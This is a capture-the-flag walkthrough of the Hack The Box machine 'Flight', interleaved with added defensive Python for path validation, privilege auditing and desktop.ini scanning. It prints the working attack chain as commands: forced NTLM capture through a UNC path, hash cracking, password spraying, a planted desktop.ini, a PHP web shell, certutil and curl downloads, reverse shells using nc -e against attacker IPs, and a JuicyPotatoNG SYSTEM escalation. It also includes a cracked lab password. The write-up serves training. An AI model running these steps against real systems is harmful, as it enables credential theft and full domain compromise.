Hack the Box (HTB) academy machines walkthrough – Flight: Flight from HackTheBox involved forced NTLM authentication to capture svc_apache's hash. Password spraying the enumerated usernames led us to S.moon, who had write access to the Shared share, allowing us to upload a desktop.ini and again perform forced authentication to get c.bum's hash. This user had access to the web directory through SMB, allowing us to upload a PHP file that gave us command execution as svc_apache. Enumerating local ports showed port 8000 running and hosting the directory C:\inetpub\development; uploading an ASPX file there returned commands running in the context of iis apppool, a service account which had the SeImpersonate privilege enabled, which can be abused through JuicyPotato to get a SYSTEM shell.
NMAP
$ nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49697/tcp open unknown
49709/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds
Checking the Subdomains and Subfolders:
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://flight.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000624: 200 90 L 412 W 3996 Ch "school"
After getting the subdomain school, we continue to enumerate the URL.
dirsearch -u http://school.flight.htb
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt
Target: http://school.flight.htb/
But I noticed this evidence:
It may be an LFI vulnerability in this URL, so we check it with ../../../../etc/passwd and get the result.
So we check the source code to see exactly how the filter works:
<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
(strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
(strpos(urldecode($_GET['view']),'\\')!==false)||
(strpos(urldecode($_GET['view']),'htaccess')!==false)||
(strpos(urldecode($_GET['view']),'.shtml')!==false)
){
echo "<h1>Suspicious Activity Blocked!";
echo "<h3>Incident will be reported</h3>\r\n";
}else{
echo file_get_contents($_GET['view']);
}
}else{
echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>
Hmm, it may be quite hard to bypass this filter to exploit the vulnerability. The URL validation prevents us from doing LFI, but we can use this code to force the service to fetch a remote source using Windows network share syntax, //<ip>/<share>, and attempt to capture the hash of a service account.
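The bypass just described is easier to see with the filter logic in runnable form. The following Python is an added example, not the site's PHP: blocklist_allows mirrors the strpos() chain above (so //<ip>/<share> passes while .. and php://filter are rejected), and allowlist_resolve shows the fix a defender would apply instead, an allowlist of extensions plus a resolved-path check against the web root, which refuses UNC and absolute paths outright. WEB_ROOT, the htdocs_sample directory and the function names are assumptions of this example.

```python
"""Added example (not the site's code): the view-parameter blocklist from index.php
re-implemented in Python, next to an allowlist resolver that refuses UNC/remote paths
and confines every request to the web root.  Names and the sample root directory are
assumptions for illustration."""
import os
from urllib.parse import unquote

# Tokens the PHP strpos() chain rejects; 'filter' is handled separately (case-insensitive)
BLOCKED_TOKENS = ("..", "\\", "htaccess", ".shtml")


def blocklist_allows(view: str) -> bool:
    """Mirror of the page's check: True when index.php would serve the request."""
    decoded = unquote(view)                # the PHP code urldecode()s the already-decoded value
    if "filter" in unquote(view.lower()):  # strtolower() runs before urldecode() in the original
        return False
    return not any(token in decoded for token in BLOCKED_TOKENS)


# Hypothetical web root for the hardened version (constructed; need not exist on disk)
WEB_ROOT = os.path.realpath("htdocs_sample")
ALLOWED_EXTENSIONS = {".html"}


def allowlist_resolve(view: str, root: str = WEB_ROOT):
    """Return the canonical on-disk path to serve, or None if the request must be refused.

    Unlike the blocklist, this never hands the raw parameter to file_get_contents():
    it rejects absolute, drive-letter and UNC forms (both \\\\host\\share and //host/share),
    allows only an explicit extension set, and then checks that the *resolved* path is
    still inside the web root, which defeats traversal and symlink escapes alike."""
    decoded = unquote(view)
    if not decoded or decoded.startswith(("/", "\\")) or ":" in decoded or "\\" in decoded:
        return None
    if os.path.splitext(decoded)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("home.html", "../../../../etc/passwd", "//10.10.16.13/test", "%2e%2e/secret.html"):
        print(f"{probe:32} blocklist={blocklist_allows(probe)!s:5} allowlist={allowlist_resolve(probe)}")
```

The point of the second function is that it decides on what the path resolves to rather than on what the string contains, so there is no token list to keep complete.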
#Website:
http://school.flight.htb/index.php?view=//ip-attack/test
#Attacker's machine:
responder -I tun0 -wPv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Responder IPv6 [dead:beef:4::100b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-UJ4VMU7XFG1]
Responder Domain Name [R924.LOCAL]
Responder DCE-RPC Port [47241]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:90b54e5073440f[...]
Crack this hash with hashcat and get the result:
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:010100000000000080c8475ed80dd901b5e12e7f671312270000000002000800590048003900320001001e00570049004e002d0030005200590058005800350031005800460041004b0004003400570049004e002d0030005200590058005800350031005800460041004b002e0059004800390032002e004c004f00430041004c000300140059004800390032002e004c004f00430041004c000500140059004800390032002e004c004f00430041004c000700080080c8475ed80dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:S*******13
PORT 139/445 (SMB)
Checking null authentication on SMB shows that we can't access any share anonymously.
After getting svc_apache's credentials, we check the shares in the SMB service:
smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
Users Disk
Web Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
AD Enum:
Perform enumeration on SMB using the previously obtained credentials:
> ~/tools/cme/cme OR crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users
SMB flight.htb 445 G0 flight.htb\O.Possum badpwdcount: 0 desc: Helpdesk
SMB flight.htb 445 G0 flight.htb\svc_apache badpwdcount: 0 desc: Service Apache web
SMB flight.htb 445 G0 flight.htb\V.Stevens badpwdcount: 0 desc: Secretary
SMB flight.htb 445 G0 flight.htb\D.Truff badpwdcount: 0 desc: Project Manager
SMB flight.htb 445 G0 flight.htb\I.Francis badpwdcount: 0 desc: Nobody knows why he's here
SMB flight.htb 445 G0 flight.htb\W.Walker badpwdcount: 0 desc: Payroll officer
SMB flight.htb 445 G0 flight.htb\C.Bum badpwdcount: 1 desc: Senior Web Developer
SMB flight.htb 445 G0 flight.htb\M.Gold badpwdcount: 0 desc: Sysadmin
SMB flight.htb 445 G0 flight.htb\L.Kein badpwdcount: 0 desc: Penetration tester
SMB flight.htb 445 G0 flight.htb\G.Lors badpwdcount: 0 desc: Sales manager
SMB flight.htb 445 G0 flight.htb\R.Cold badpwdcount: 0 desc: HR Assistant
SMB flight.htb 445 G0 flight.htb\S.Moon badpwdcount: 0 desc: Junio
Using a similar approach, we learn that another user, s.moon, is using the same password as svc_apache:
> ~/tools/cme/cme OR crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB flight.htb 445 G0 [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S*********3
SMB flight.htb 445 G0 [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S*********3
User: C.bum
Using Impacket's psexec, we can find out which share is writable: Shared. But there seems to be customised code that prevents a lot of file types from being written.
impacket-psexec flight.htb/s.moon@g0.flight.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[.ShellClassInfo]
IconResource=\\<ip>\test
After creating the desktop.ini file above, we put it in the Shared SMB folder:
smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
On the attacker's machine:
responder -I tun0 -wPv
[+] Current Session Variables:
Responder Machine Name [WIN-W7Y6MWYR8I8]
Responder Domain Name [K8PD.LOCAL]
Responder DCE-RPC Port [46715]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:c69dd0be9d4ce77f[...]
After that we use hashcat to crack c.bum's password:
hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:010100000000000080375566db0dd9010a4e5110dfd2119000000000020008004e0042004200380001001e00570049004e002d0042005400540039004a0050005a004a0042003700550004003400570049004e002d0042005400540039004a0050005a004a004200370055002e004e004200420038002e004c004f00430041004c00030014004e004200420038002e004c004f00430041004c00050014004e004200420038002e004c004f00430041004c000700080080375566db0dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:T*************4
After getting these credentials, we can log into the Web folder via SMB.
smbclient //flight.htb/Web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
Then I put the p0wny-shell into the flight.htb folder: https://github.com/flozz/p0wny-shell
smb: \> ls
. D 0 Tue Dec 13 09:57:01 2022
.. D 0 Tue Dec 13 09:57:01 2022
flight.htb D 0 Tue Dec 13 09:57:01 2022
school.flight.htb D 0 Tue Dec 13 09:57:01 2022
5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>
Then we go to the web shell and get a reverse shell session using a payload from revshells.com.
C.bum Session:
We have c.bum's credentials, so we switch the session to c.bum with RunasCs: https://github.com/antonioCoco/RunasCs/tree/master
PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.
After that we can read the user.txt file.
P.E (Privilege Escalation)
After getting the shell as the svc_apache user, I check which ports are open to see what services are listening and find port 8000. So I pivot to it with chisel to interact with it from the attacker's machine:
PS C:\xampp\htdocs\flight.htb> netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
Pivoting Network with Chisel:
#Client:
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000
#Server:
chisel server --reverse -p 9999
After getting connected to the website, I realise it is written in ASP.NET, so I can try to upload an .aspx shell to get a reverse session.
Because the shell may be removed very quickly, we upload it somewhere else first and then just copy it into place:
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
We get the reverse shell as iis apppool\defaultapppool.
Administrator
Enum:
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
After referring to this post, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens, I decide to use JuicyPotato to escalate privileges on this machine: https://github.com/antonioCoco/JuicyPotatoNG
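For an auditor, the whoami /priv listing above is the thing to check on every service and application-pool identity. The following Python is an added example, not part of the walkthrough: it parses whoami /priv text (aligned or whitespace-collapsed, as printed above), and reports which enabled privileges matter for escalation. The HIGH_RISK table and function names are assumptions of this example; the sample text is the listing from the iis apppool shell.

```python
"""Added example, not from the walkthrough: parse `whoami /priv` output and flag enabled
privileges that let a service or application-pool identity escalate.  The sample text is
the listing shown above; the risk table is an assumption of this example."""
from typing import Dict, List, Tuple

# Privileges whose *enabled* state on a low-privileged service identity is worth an alert
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate authenticated clients (potato-style SYSTEM escalation)",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeDebugPrivilege": "open and inject into any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample: the listing from the iis apppool shell above (whitespace-collapsed)
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def parse_whoami_priv(text: str) -> Dict[str, Tuple[str, str]]:
    """Map privilege name -> (description, state). Works on aligned or collapsed whitespace."""
    privs: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        parts = line.split()
        # A privilege row starts with an Se* name and ends with its state; skip headers/rules
        if len(parts) < 3 or not parts[0].startswith("Se") or parts[-1] not in ("Enabled", "Disabled"):
            continue
        privs[parts[0]] = (" ".join(parts[1:-1]), parts[-1])
    return privs


def risky_enabled(privs: Dict[str, Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Enabled privileges from HIGH_RISK, each with the reason it matters."""
    return sorted((name, HIGH_RISK[name]) for name, (_, state) in privs.items()
                  if state == "Enabled" and name in HIGH_RISK)


if __name__ == "__main__":
    parsed = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name, reason in risky_enabled(parsed):
        print(f"{name}: {reason}")
```

On this listing the only finding is SeImpersonatePrivilege. IIS application-pool identities hold it by default, so the finding is expected on any IIS host; the controls that would have mattered here are the ones upstream of it, namely the write access to the web content directories that let an attacker get code running inside the pool in the first place.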
I upload two files into c:\users\c.bum\desktop:
>certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
>certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe
After that we grant full control on both files to the Users group:
>icacls nc.exe /grant Users:F
>icacls test.exe /grant Users:F
We go to the iis apppool session to get the root shell:
c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"
Result:
2nd Method
PORT 80 (HTTP)
The site didn't have anything there, as it was just a page with no links; gobuster also didn't show anything interesting.
So we add flight.htb to the /etc/hosts file, as we can see the domain name at the bottom of the page.
Fuzzing for subdomains using wfuzz:
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb" --hh 7069
Adding this subdomain to the hosts file and accessing the site.
Checking for Local File Inclusion, it filters .. if it's in the URL but allows /
Foothold (Svc_apache)
Running wfuzz again to fuzz for LFI payloads, we find that we can just specify a file name without using ..
Let's verify if we have remote file inclusion; if we do, we can just try accessing a fake share on our machine and use responder to capture the NTLMv2 hash.
We have a hit, so now we run responder and access a fake share with //IP/share:
responder -I tun0
http://school.flight.htb/index.php?view=//10.10.14.28/uwu
Saving this hash in a file and cracking it with john:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
With the valid credentials we can start enumerating the shares and usernames through crackmapexec.
Using enum4linux to query usernames and filtering them so that we can password spray on them:
enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt
S.moon
Using either cme or kerbrute to perform a password spray, we'll find that S.Moon has the same password:
kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
Checking shares with s.moon, we see that we have write access on `shared`
C.bum
Uploading a file with the .scf extension to perform forced authentication didn't work: it didn't allow us to upload that extension, not sure why.
But uploading a desktop.ini file worked:
[.ShellClassInfo]
IconResource=\\10.10.14.28\aa
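Both walkthroughs plant a desktop.ini (and this one also tries an .scf) whose icon entry points at an attacker-controlled UNC path, so that Explorer authenticates outbound when the folder is browsed. From the defender's side the planted file is the artefact to hunt for on writable shares. The following Python is an added example, not part of the walkthrough: it scans share contents for desktop.ini / .scf files whose IconResource or IconFile entries point off-host and reports the host they would authenticate to. The SAMPLE_SHARE listing is constructed for illustration and the function names are assumptions.

```python
"""Added example, not part of the walkthrough: scan the contents of a file share for
desktop.ini / .scf files whose icon entries point at a UNC path, the forced-authentication
planting shown above.  The share listing below is constructed for illustration."""
import re
from typing import Dict, List, Tuple

# INI keys Explorer resolves on its own when it draws the folder or shortcut icon
ICON_KEYS = {"iconresource", "iconfile"}
# \\host\share... or //host/share... ; group 1 captures the host that would receive the auth
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")

# Constructed sample: path -> file content as it would be read from the share
SAMPLE_SHARE: Dict[str, str] = {
    r"\\flight.htb\Shared\desktop.ini":      "[.ShellClassInfo]\r\nIconResource=\\\\10.10.16.13\\test\r\n",
    r"\\flight.htb\Shared\docs\desktop.ini": "[.ShellClassInfo]\r\nIconResource=C:\\Windows\\System32\\shell32.dll,3\r\n",
    r"\\flight.htb\Shared\report.scf":       "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.16.13\\share\\x.ico\r\n",
    r"\\flight.htb\Shared\readme.txt":       "IconResource=\\\\10.10.16.13\\test\r\n",  # wrong file type: Explorer ignores it
}


def is_icon_carrier(name: str) -> bool:
    """Only desktop.ini and *.scf are parsed by Explorer for icon locations."""
    lowered = name.lower()
    return lowered == "desktop.ini" or lowered.endswith(".scf")


def find_unc_icon_refs(name: str, content: str) -> List[Tuple[str, str, str]]:
    """Return (key, target, host) for every icon entry in `content` that points off-host."""
    if not is_icon_carrier(name):
        return []
    hits: List[Tuple[str, str, str]] = []
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#", "[")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        match = UNC_RE.match(value)
        if key in ICON_KEYS and match:
            hits.append((key, value, match.group(1)))
    return hits


def scan_share(files: Dict[str, str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Map each offending file path to its remote icon references."""
    findings: Dict[str, List[Tuple[str, str, str]]] = {}
    for path, content in files.items():
        name = path.replace("/", "\\").rsplit("\\", 1)[-1]
        refs = find_unc_icon_refs(name, content)
        if refs:
            findings[path] = refs
    return findings


if __name__ == "__main__":
    for path, refs in scan_share(SAMPLE_SHARE).items():
        for key, target, host in refs:
            print(f"{path}: {key}={target}  (would authenticate to {host})")
```

A local IconResource such as shell32.dll is normal and is left alone; only entries that resolve to another host are reported, which is what distinguishes a planted file from a legitimately customised folder.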
Cracking this hash again with john
Foothold
This user has write access on the Web share, which means we can upload a PHP file that will be reflected on school.flight.htb.
Uploading a PHP file calling phpinfo():
<?php phpinfo(); ?>
Having the ability to execute commands on the system we can get a reverse shell by uploading nc.exe and executing it
http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe
http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe
Since we already have c.bum's credentials, we can execute commands as that user using RunasCs.exe:
.\RunasCs.exe c.bum Tikkycoll_431012284 whoami
Running netstat, we’ll see that there’s port 8000 open locally
Port forwarding port 8000 using chisel:
chisel server --reverse -p 8001
And running the client on the target machine
.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000
Accessing the port on our browser shows that access is denied
But this shows the path where the directory is hosted,
C:\inetpub\Development
In this folder, there are few html files
Running icacls on the Development folder shows that c.bum has write access.
Using RunasCs we can switch user to c.bum and transfer an ASPX shell into that directory:
.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'
I tried executing nc.exe to get a reverse shell but it wasn't working for some reason, so instead I generated a msfvenom payload, transferred it and executed it.
On checking the privileges of iis apppool, SeImpersonate was enabled.
To abuse this, we can use JuicyPotato-ng to get a SYSTEM shell:
.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"